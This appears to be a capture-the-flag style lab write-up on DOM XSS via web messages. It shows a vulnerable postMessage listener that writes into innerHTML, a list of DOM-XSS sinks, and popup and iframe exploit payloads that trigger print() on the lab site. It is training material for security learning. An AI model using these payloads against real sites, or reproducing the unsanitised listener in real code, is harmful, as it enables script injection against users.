Shelled

DOM XSS using Web Messages

2023/08/01 6:12PM

Description

This lab demonstrates a simple web message vulnerability. To solve this lab, use the exploit server to post a message to the target site that causes the `print()` function to be called.

This lab involves using post messages. This chrome extension is amazing and should be used when hunting for bugs. - https://github.com/fransr/postMessage-tracker. The extension monitors `postMessage listeners` by showing an indicator about the amount of listeners in the current window.

Getting Started

When the page we can see that the chrome extension indicates that there is 1 post message listener in the current window.

Vulnerability

The chrome extension is giving us the `postMessage-listener` code as well as telling us that the code is located on line 53.

The code below creates a `postMessage-listener` and will take the data from the `postMessage` to be used in the sink `document.getElementById('ads').innerHTML`. This is an issue because `.innerHTML` is a sink that can be used for DOM XSS.


    <script>
        window.addEventListener('message', function(e) {
            document.getElementById('ads').innerHTML = e.data;
        })
    </script>

*List of Sinks that can Lead to DOM-XSS*


    document.write()
    document.writeln()
    document.domain
    element.innerHTML
    element.outerHTML
    element.insertAdjacentHTML
    element.onevent

Exploit

Lets craft a payload that can be used to cause the victim to execute the `print()` function. Go to the exploit sever and put the following code in the `Body`.


    <script>
    window.pwned=window.open('https://[LAB_ID].web-security-academy.net/');
    window.pwned.postMessage('<img src=x onerror=print()>', '*');
    </script>

JavaScript `postMessages` have the following format:

targetWindow.postMessage(message, targetOrigin, [transfer]);

Now, when a user visits our website, a new window will popup and a `postMessage` is going to be sent to the vulnerable website in the context of the victim. This however will not work due to chrome blocking popups.

Since chrome is blocking popup windows, lets use an `iframe`.

<iframe src="https://[LAB_ID].web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">